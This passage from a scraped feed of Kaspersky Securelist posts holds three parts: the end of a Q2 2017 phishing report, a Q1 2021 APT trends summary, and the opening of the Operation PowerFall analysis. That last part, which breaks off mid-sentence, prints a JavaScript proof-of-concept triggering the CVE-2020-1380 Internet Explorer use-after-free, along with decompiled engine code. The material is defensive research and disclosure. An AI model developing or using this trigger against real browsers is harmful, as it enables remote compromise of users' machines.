attacks.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Attacked_organizations_EN.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Attacked_organizations_EN.png>)\n\n_Distribution of organizations affected by phishing attacks by category, Q2 2017_\n\n### Hot topics this quarter\n\n#### Airline tickets\n\nIn the second quarter of 2017, Facebook was hit with a wave of posts that falsely claimed that major [airlines were giving away tickets for free](<https://securelist.com/two-tickets-as-bait/78686/>). Naturally, there were no promotions giving away airline tickets: fraudsters had created a number of sites on which users were congratulated on winning an air ticket and were asked to perform a series of actions to receive their prize. First, the victims were asked to post the promotional information on their Facebook page. Secondly, the victims had to click the \"Like\" button. After performing all the necessary actions, the website redirected the user to a resource promoted by the fraudsters. The content of these pages varied \u2013 from harmless ads to malicious software.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_28.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_28.png>)\n\n#### False browser blocking\n\nAlmost all the popular browsers have built-in protection against web threats. When entering a malicious or phishing page, they often warn the user of the potential dangers and recommend not visiting it.\n\nFraudsters also make use this protection measure for their own purposes and distract the victim with warnings. For example, they simulate the Chrome blocking page. A user who has ever seen this warning from the browser is more likely to trust the page and follow the criminals' prompts.\n\nThe main danger of these pages is that careful examination of the address bar doesn't help \u2013 a browser warning usually \"pops up\" on untrusted web resources.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_29.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_29.png>)\n\nHowever, they may also appear when trying to enter a domain belonging to companies that act as a hosting service. And it is precisely such warnings that cause the victims to have greater trust in them:\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_30.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_30.png>)\n\nAs a rule, when a user calls the numbers specified, the fraudsters pretend to be a support service, tricking victims into paying for services they allegedly need.\n\n#### Punycode encoding\n\nClose examination of the address bar may not help if the phishers use non-Latin characters that are similar to Latin letters to create domain names that are almost identical to the names of popular web resources. Web browsers use Punycode to represent Unicode characters in a URL. However, if all the characters in the domain name belong to the character set of one language, the browser will display them in the language specified rather than in Punycode.\n\nThe screenshot of the phishing page below demonstrates this technique.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_31.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_31.png>)\n\nSometimes on closer examination, you can see inconsistencies, for example, like the dot under the letter 'e'.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_32.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_32.png>)\n\nHave a look at the banner of the blocking site: it displays a URL in Punycode. However, it differs from what we see in the browser. This address is definitely not a domain owned by a well-known company.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_33.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_33.png>)\n\nTechnically, the address is completely different from the original one. Moreover, phishers have used different encodings in the names of pages before. However, for ordinary users, recognizing this type of phishing can be a problem.\n\n#### Attacks on Uber users\n\nOne of Q2's high-profile news stories was an attack on Uber users. Phishing pages were distributed via spam mailings; recipients were offered a large discount if they completed a \"registration\" form, where in addition to personal data they had to enter their bank card information. After completing the questionnaire, the user was redirected to the legitimate site of the company.\n\nBecause Uber often holds promotions and offers discounts, users are less inclined to doubt the authenticity of the offer.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_34.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_34.png>)\n\n#### TOP 3 attacked organizations\n\nFraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab's heuristic anti-phishing component are for phishing pages hiding behind the names of fewer than 15 companies.\n\n**Organization** | **% ****of detected phishing links** \n---|--- \nFacebook | 8.33 \nMicrosoft Corporation | 8.22 \nYahoo! | 8.01 \n \nFor the third quarter in a row the top three organizations attacked most often by phishers remained unchanged. In Q1, Yahoo! was the organization whose brand was mentioned most often on phishing pages. However, in the second quarter it dropped to third, giving way to Facebook (8.33%) and Microsoft (8.22%).\n\nOne of the phishers' tricks is to place pages of popular organizations on domains belonging to other popular organizations. In the example below, a link to a free hosting service is shown, and while not all users will know what this is, mentioning Google is more likely to make them think it's genuine.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_35.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_35.png>)\n\nThe actual data form is usually located on another domain, where a user ends up after clicking on the button.\n\n## Conclusion\n\nIn Q2 2017, the average share of spam in global email traffic amounted to 56.97%, which was only 1.07 p.p. more than in the previous quarter. One of the most notable events of this quarter \u2013 the WannaCry epidemic \u2013 did not go unnoticed by spammers: numerous mass mailings contained offers of assistance in combating the ransomware, as well as various workshops and training for users.\n\nIn the second quarter, the most popular malware family was the JS.SLoad (8.73%), with another downloader, MSWord.Agent, in second (3.31%). The Fareit Trojan family (3.29%) rounded off the top three.\n\nThe Anti-Phishing system prevented over 46.5 million attempted visits to phishing pages on the computers of Kaspersky Lab users. Overall, 8.26% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q2 2017. Noticeably, in their earlier attacks, fraudsters counted on user carelessness and low levels of Internet literacy. However, as users are becoming more cyber savvy, phishers have had to come up with new tricks, such as placing phishing pages on domains owned by well-known organizations.", "cvss3": {}, "published": "2017-08-22T09:00:29", "title": "Spam and phishing in Q2 2017", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-08-22T09:00:29", "href": "https://securelist.com/spam-and-phishing-in-q2-2017/81537/", "id": "SECURELIST:9E653409B4D8C46D45939FA37442E456", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-04-27T12:27:51", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/21082144/abstract-digital-yellow-990x400.jpeg)\n\nFor four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q1 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation. Further investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group. The shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. Prior to the posts, on February 28, we identified related exploitation on less than a dozen Exchange systems; we also found more than a dozen Exchange artefacts indicating exploitation uploaded to multi-scanner services. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits are now available to multiple groups.\n\nWe have also discovered a campaign active since mid-March targeting governmental entities in the Russian Federation, using the aforementioned Exchange zero-day exploits. This campaign made use of a previously unknown malware family we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\n## Europe\n\nDuring routine monitoring of detections for FinFisher spyware tools, we discovered traces that point to recent FinFly Web deployments. In particular, we discovered two servers with web applications that we suspect, with high confidence, were generated using FinFly Web. FinFly Web is, in essence, a suite of tools and packages that implement a web-based exploitation server. It was first publicly documented in 2014, in the aftermath of the Gamma Group hacking incident. One of the suspected FinFly Web servers was active for more than a year between October 2019 and December 2020. This server was disabled a day after our discovery last December. Nevertheless, we were able to capture a copy of its landing page, which included JavaScript used to profile victims using what appears to be previously unknown code. In the second case, the server hosting FinFly Web was already offline at the moment of discovery, so we drew our conclusions using available historical data. As it turned out, it was active for a very short time around September 2020 on a host that appears to have been impersonating the popular Mail.ru service. Surprisingly, this server began answering queries again on January 12. So far, we haven't seen any related payloads being dropped by these web pages.\n\n## Russian-speaking activity\n\nKazuar is a .NET backdoor usually associated with the Turla threat actor (aka Snake and Uroboros). Recently, Kazuar received renewed interest due to its similarities with the Sunburst backdoor. Although the capabilities of Kazuar have already been exposed in public research, many interesting facts about this backdoor were not made public. Our latest reports focus on the changes the threat actor made to the September and November versions of its backdoor.\n\nOn February 24, the National Security Defense Council of Ukraine (NSDC) publicly warned that a threat actor had exploited a national documents circulation system (SEI EB) to distribute malicious documents to Ukrainian public authorities. The alert contained a few related network IoCs, and specified that the documents used malicious macros in order to drop an implant onto targeted systems. Thanks to the shared IoCs, we were able to attribute this attack, with high confidence, to the Gamaredon threat actor. The malicious server IP mentioned by the NSDC has been known to Kaspersky since February as Gamaredon infrastructure.\n\nOn January 27, the French national cybersecurity agency (ANSSI) published a report describing an attack campaign that targeted publicly exposed and obsolete Centreon systems between 2017 and 2020, in order to deploy Fobushell (aka P.A.S.) webshells and Exaramel implants. ANSSI associated the campaign with the Sandworm intrusion-set, which we refer to as Hades. Although we specifically looked for additional compromised Centreon systems, Exaramel implant samples or associated infrastructure, we were unable to retrieve any useful artifacts from which we could initiate a comprehensive investigation. However, we did identify three Centreon servers where a Fobushell webshell had been deployed. One of those Fobushell samples was identical to another we previously identified on a Zebrocy C2 server.\n\n## Chinese-speaking activity\n\nWe discovered a set of malicious activities, which we named EdwardsPheasant, targeting mainly government organizations in Vietnam since June 2020. The attackers leverage previously unknown and obfuscated backdoors and loaders. The activities peaked in November 2020, but are still ongoing. The associated threat actor continues to leverage its tools and tactics (described in our private report) to compromise targets or maintain access in their networks. While we could identify similarities with the tools and tactics associated with Cycldek (aka Goblin Panda) and Lucky Mouse (aka Emissary Panda), we have been unable to attribute this set of activities to either of them conclusively.\n\nWe investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our [public report](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Middle East\n\nWe recently came across previously unknown malicious artifacts that we attributed to the Lyceum/Hexane threat group, showing that the attackers behind it are still active and have been developing their toolset during the last year. Although Lyceum still prefers taking advantage of DNS tunneling, it appears to have replaced the previously documented .NET payload with a new C++ backdoor and a PowerShell script that serve the same purpose. Our telemetry revealed that the threat group's latest endeavors are focused on going after entities within one country \u2013 Tunisia. The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies. Based on the targeted industries, we assume that the attackers may have been interested in compromising these entities to track the movements and communications of individuals that are of interest to them. This could mean that the latest Lyceum cluster has an operational focus on targeting Tunisia, or that it is a subset of broader activity that is yet to be discovered.\n\nOn November 19, 2020, Shadow Chaser Group tweeted about a suspected MuddyWater APT malicious document potentially targeting a university in the United Arab Emirates. Based on our analysis since then, we suspect this intrusion is part of a campaign that started at least in early October 2020 and was last seen active in late December 2020. The threat actor relied on VBS-based malware to infect organizations from government, NGO and education sectors. Our telemetry, however, indicates that no further tools were deployed and we do not believe that data theft took place either. This indicates to us that the attackers are currently in the reconnaissance phase of their operation, and we expect subsequent waves of attacks to follow in the near future. In our private report, we provide an in-depth analysis of the malicious documents used by this threat actor and study their similarities to known MuddyWater tooling. The infrastructure setup and communications scheme are also similar to past incidents attributed to this group. The actor maintains a small set of first-stage C2 servers to connect back from the VBS implant for initial communications. Initial reconnaissance is performed by the actor and communication with the implant is handed off to a second-stage C2 for additional downloads. Finally, we present similarities with known TTPs of the MuddyWater group and attribute this campaign to them with medium confidence.\n\nDomestic Kitten is a threat group mainly known for its mobile backdoors. The group's operations were exposed in 2018, showing that it was conducting surveillance attacks against individuals in the Middle East. The threat group targeted Android users by sending them popular and well-known applications that were backdoored and contained malicious code. Many of the applications had religious or political themes and were intended for Farsi, Arabic and Kurdish speakers, possibly alluding to this attack's main targets. We have discovered new evidence showing that Domestic Kitten has been using PE executables to target victims using Windows since at least 2013, with some evidence that it goes back to 2011. The Windows version, which, to the best of our knowledge, has not been described in the past, was delivered in several versions, with the more recent one used for at least three and a half years to target individuals in parallel to the group's mobile campaigns. The implant functionality and infrastructure in that version have remained the same all along, and have been used in the group's activity witnessed this year.\n\nFerocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar and, to the best of our knowledge, has not been covered by security researchers. It only recently attracted attention when a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. We have been able to expand some of the findings on the group and provide insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's machine. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point. In our private report, we expand the details on these findings as well as provide analysis and mechanics of the MarkiRAT malware.\n\nKarkadann is a threat actor that has been targeting government bodies and news outlets in the Middle East since at least October 2020. The threat actor leverages tailor-made malicious documents with embedded macros that trigger an infection chain, opening a URL in Internet Explorer. The minimal functionality present in the macros and the browser specification suggest that the threat actor might be exploiting a privilege-escalation vulnerability in Internet Explorer. Despite the small amount of evidence available for analysis in the Karkadann case, we were able to find several similarities to the Piwiks case, a watering-hole attack we discovered that targeted multiple prominent websites in the Middle East. Our private report presents the recent Karkadann campaigns and the similarities between this campaign and the Piwiks case. The report concludes with some infrastructure overlaps with unattributed clusters that we have seen since last year that are potentially linked to the same threat actor.\n\n## Southeast Asia and Korean Peninsula\n\nWe discovered that the Kimsuky group adopted a new method to deliver its malware in its latest campaign on a South Korean stock trading application. In this campaign, beginning in December 2020, the group compromised a website belonging to the vendor of stock trading software, replacing the hosted installation package with a malicious one. Kimsuky also delivered its malware by utilizing a malicious Hangul (HWP) document containing COVID-19-related bait that discusses a government relief fund. Both infection vectors ultimately deliver the Quasar RAT. Compared to Kimsuky's last reported infection chain, composed of various scripts, the new scheme adds complications and introduces less popular file types, involving VBS scripts, XML and Extensible Stylesheet Language (XSL) files with embedded C# code in order to fetch and execute stagers and payloads. Based on the lure document and characteristics of the compromised installation package, we conclude that this attack is financially motivated, which, as we have previously reported, is one of Kimsuky's main focus areas.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced that a North Korean-related threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog and installed a Chrome exploit. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We can confirm that several infrastructures on the blog overlap with our previously published reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data, analyzing logs and files present on the servers. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research. You can read our public report [here](<https://securelist.com/lazarus-threatneedle/100803/>).\n\nFollowing up our previous investigation into Lazarus attacks on the defense industry using ThreatNeedle, we discovered another malware cluster named CookieTime used in a campaign mainly focused on the defense industry. We detected activity in September and November 2020, with samples dating back to April 2020. Compared to the already known malware clusters of the Lazarus group, CookieTime shows a different structure and functionality. This malware communicates with the C2 server using the HTTP protocol. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. The C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results. We had a chance to look into the command and control script as a result of working closely with a local CERT to take down the threat actor's infrastructure. The malware control servers are configured in a multi-stage fashion and only deliver the command file to valuable hosts.\n\nWhile investigating the artifacts of a supply-chain attack on the Vietnam Government Certification Authority's (VGCA) website, we discovered that the first Trojanized package dates to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins deployed using PhantomNet malware, which was delivered using Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware. In our private report, we offer a detailed description for each post-compromise tool used in the attack, as well as other tools belonging to the actor's arsenal. Finally, we also explore CoughingDown attribution in the light of recent discoveries.\n\nOn February 10, DBAPPSecurity published details about a zero-day exploit they discovered last December. Aside from the details of the exploit itself, researchers also mentioned it being used in the wild by BitterAPT. While no such subsequent information was given in the initial report to explain the attribution claims, our investigation into this activity confirms the exploit was in fact being used exclusively by this actor. We assigned the name TurtlePower to the campaign that makes use of this exploit, along with the other tools used to target governmental and telecom entities in Pakistan and China. We have also confidently linked the origin of this exploit to a broker we refer to as Moses. Moses has been responsible for the development of at least five exploits patched in the last two years. We have also been able to tie the usage of some of these exploits to at least two different actors thus far \u2013 BitterAPT and DarkHotel. At this time, it is unclear how these threat actors are obtaining exploits from Moses, whether it is through direct purchase or another third-party provider. During the TurtlePower campaign, BitterAPT used a wide array of tools on its victims to include a stage one payload named ArtraDownloader, a stage two payload named Splinter, a keylogger named SourLogger, an infostealer named SourFilling, as well as variations of Mimikatz to gather specific files and maintain its access. This particular campaign also appears to be narrowly focused on targets within Pakistan and China (based on the initial report referenced). While we can verify specific targeting within Pakistan using our own data, we have not been able to do the same regarding China. Use of CVE-2021-1732 peaked between June and July 2020, but the overall campaign is still ongoing.\n\nIn 2020, we observed new waves of attacks related to Dropping Elephant (aka Patchwork, Chinastrats), focusing on targets in China and Pakistan. We also noted a few targets outside of the group's traditional area of operations, namely in the Middle East, and a growing interest in the African continent. The attacks followed the group's well-established TTPs, which include the use of malicious documents crafted to exploit a remote code execution vulnerability in Microsoft Office, and the signature JakyllHyde (aka BadNews) Trojan in the later infection stages. Dropping Elephant introduced a new loader for JakyllHyde, a tool we named Crypta. It contains mechanisms to hinder detection and appears to be a core component of this APT actor's recent toolset. Crypta and its variants have been observed in multiple scenarios loading a wide range of subsequent payloads, such as Bozok RAT, Quasar RAT and LokiBot. An additional Trojan discovered during our research was PubFantacy. To our knowledge, this tool has never been publicly described and has been used to target Windows servers since at least 2018.\n\nWe recently discovered a previously publicly unknown Android implant used in 2018-2019 by the SideWinder threat group, which we dubbed BroStealer. The main purpose of the BroStealer implant is to collect sensitive information from a victim's device, such as photos, SMS messages, call recordings and files from various messaging applications. Although SideWinder has numerous campaigns against victims using the Windows platform, recent reports have shown that this threat group also goes after its targets via the mobile platform.\n\n## Other interesting discoveries\n\nIn February 2019, multiple antivirus companies received a collection of malware samples, most of them associated with various known APT groups. Some of the samples cannot be associated with any known activity. Some, in particular, attracted our attention due to their sophistication. The samples were compiled in 2014 and, accordingly, were likely deployed in 2014 and possibly as late as 2015. Although we have not found any shared code with any other known malware, the samples have intersections of coding patterns, style and techniques that have been seen in various [Lambert families](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>). We therefore named this malware Purple Lambert. Purple Lambert is composed of several modules, with its network module passively listening for a magic packet. It is capable of providing an attacker with basic information about the infected system and executing a received payload. Its functionality reminds us of Gray Lambert, another user-mode passive listener. Gray Lambert turned out to be a replacement of the kernel-mode passive-listener White Lambert implant in multiple incidents. In addition, Purple Lambert implements functionality similar to, but in different ways, both Gray Lambert and White Lambert. Our report, available to subscribers of our APT threat reports, includes discussion of both the passive-listener payload and the loader functionality included in the main module.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q1 2021:\n\n * Perhaps the most predominant attack we researched in this quarter was the SolarWinds attack. SolarWinds showed once again how successful a supply-chain attack can be, especially where attackers go the extra mile to remain hidden and maintain persistence in a target network. The scope of this attack is still being investigated as more zero-day flaws are discovered in SolarWinds products.\n * Another critical wave of attacks was the exploitation of Microsoft Exchange zero-day vulnerabilities by multiple threat actors. We recently discovered another campaign using these exploits with different targeting, possibly related to the same cluster of activities already reported.\n * Lazarus group's bold campaign targeting security researchers worldwide also utilized zero-day vulnerabilities in browsers to compromise their targets. Their campaigns used themes centered on the use of zero-days to lure relevant researchers, possibly in an attempt to steal vulnerability research.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2021-04-27T10:00:26", "type": "securelist", "title": "APT trends report Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-04-27T10:00:26", "id": "SECURELIST:A10F281EF99381636376D6F6C6501E22", "href": "https://securelist.com/apt-trends-report-q1-2021/101967/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-13T08:04:21", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/07085414/abstract-binary-990x400.jpeg)\n\n## Executive summary\n\nIn May 2020, Kaspersky technologies prevented an attack on a South Korean company by a malicious script for Internet Explorer. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium, the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nOn June 8, 2020, we reported our discoveries to Microsoft, and the company confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability [CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>) that was used in the zero-day elevation of privilege exploit, but before our discovery, the exploitability of this vulnerability was considered less likely. The patch for CVE-2020-0986 was released on June 9, 2020.\n\nMicrosoft assigned [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) to a use-after-free vulnerability in JScript and the patch was released on August 11, 2020. \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe are calling this and related attacks 'Operation PowerFall'. Currently, we are unable to establish a definitive link with any known threat actors, but due to similarities with previously discovered exploits, we believe that [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) may be behind this attack. Kaspersky products detect Operation PowerFall attacks with verdict PDM:Exploit.Win32.Generic.\n\n## Internet Explorer 11 remote code execution exploit\n\nThe most recent zero-day exploits for Internet Explorer discovered in the wild relied on the vulnerabilities CVE-2020-0674, CVE-2019-1429, CVE-2019-0676 and CVE-2018-8653 in the legacy JavaScript engine jscript.dll. In contrast, CVE-2020-1380 is a vulnerability in jscript9.dll, which has been used by default starting with Internet Explorer 9, and because of this, the [mitigation steps](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>) recommended by Microsoft (restricting the usage of jscript.dll) cannot protect against this particular vulnerability.\n\nCVE-2020-1380 is a Use-After-Free vulnerability that is caused by JIT optimization and the lack of necessary checks in just-in-time compiled code. A proof-of-concept (PoC) that triggers vulnerability is demonstrated below:\n \n \n function func(O, A, F, O2) {\n arguments.push = Array.prototype.push;\n O = 1;\n arguments.length = 0;\n arguments.push(O2);\n if (F == 1) {\n O = 2;\n }\n \n // execute abp.valueOf() and write by dangling pointer\n A[5] = O;\n };\n \n // prepare objects\n var an = new ArrayBuffer(0x8c);\n var fa = new Float32Array(an);\n \n // compile func\n func(1, fa, 1, {});\n for (var i = 0; i < 0x10000; i++) {\n func(1, fa, 1, 1);\n }\n \n var abp = {};\n abp.valueOf = function() {\n \n // free \n worker = new Worker('worker.js');\n worker.postMessage(an, [an]);\n worker.terminate();\n worker = null;\n \n // sleep\n var start = Date.now();\n while (Date.now() - start < 200) {}\n \n // TODO: reclaim freed memory\n \n return 0\n };\n \n try {\n func(1, fa, 0, abp);\n } catch (e) {\n reload()\n }\n\nTo understand this vulnerability, let us take a look at how _func()_ is executed. It is important to understand what value is set to _A[5]_. According to the code, it should be an _O_ argument. At function start, the _O_ argument is re-assigned to 1, but then the function arguments length is set to 0. This operation does not clear function arguments (as it would normally do with regular array) but allows to put argument _O2 _into the arguments list at index zero using Array.prototype.push, meaning _O_ = _O2_ now. Besides that, if the argument _F _is equal to 1, then _O_ will be re-assigned once again, but to the integer number 2. It means that depending on the value of the _F _argument, the _O _argument is equal to either the value of the _O2 _argument or the integer number 2. The argument _A_ is a typed array of 32-bit floating point numbers, and before assigning a value to index 5 of the array, this value should be converted to a float. Converting an integer to a float is a relatively simple task, but it become less straightforward when an object is converted to a float number. The exploit uses the object _abp_ with an overridden _valueOf()_ method. This method is executed when the object is converted to a float, but inside the method there is code that frees ArrayBuffer, which is viewed by Float32Array and where the returned value will be set. To prevent the value from being stored in the memory of the freed object, the JavaScript engine needs to check the status of the object before storing the value in it. To convert and store the float value safely, JScript9.dll uses the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_. You can see decompiled code of this function below:\n \n \n int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved)\n {\n Js::JavascriptConversion::ToNumber(object, this->type->library->context);\n if ( LOBYTE(this->view[0]->unusable) )\n Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0);\n if ( index < this->count )\n {\n *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber(\n object,\n this->type->library->context);\n }\n return 1;\n }\n \n double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context)\n {\n if ( (unsigned char)object & 1 )\n return (double)((int)object >> 1);\n if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] )\n return *((double *)object + 1);\n return Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nThis function checks the _view[0]->unusable_ and _count _fields of the typed float array and when ArrayBuffer is freed during execution of the _valueOf()_ method, both of these checks will fail because _view[0]->unusable _will be set to 1 and _count _will be set to 0 during the first call to _Js::JavascriptConversion::ToNumber()_. The problem lies in the fact that the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_ is used only in interpretation mode.\n\nWhen the function _func() _is compiled just in time, the JavaScript engine will use the vulnerable code below.\n \n \n if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable )\n {\n if ( floatArray->count > index )\n {\n buffer = floatArray->buffer + 4*index;\n if ( object & 1 )\n {\n *(float *)buffer = (double)(object >> 1);\n }\n else\n {\n if ( *(void *)object != &Js::JavascriptNumber::vftable )\n {\n Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context);\n }\n else\n {\n *(float *)buffer = *(double *)(object->value);\n }\n }\n }\n }\n\nAnd here is the code of the _Js::JavascriptConversion::ToFloat_Helper()_ function.\n \n \n void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context)\n {\n *buffer = Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nAs you can see, unlike in interpretation mode, in just-in-time compiled code, the life cycle of ArrayBuffer is not checked, and its memory can be freed and then 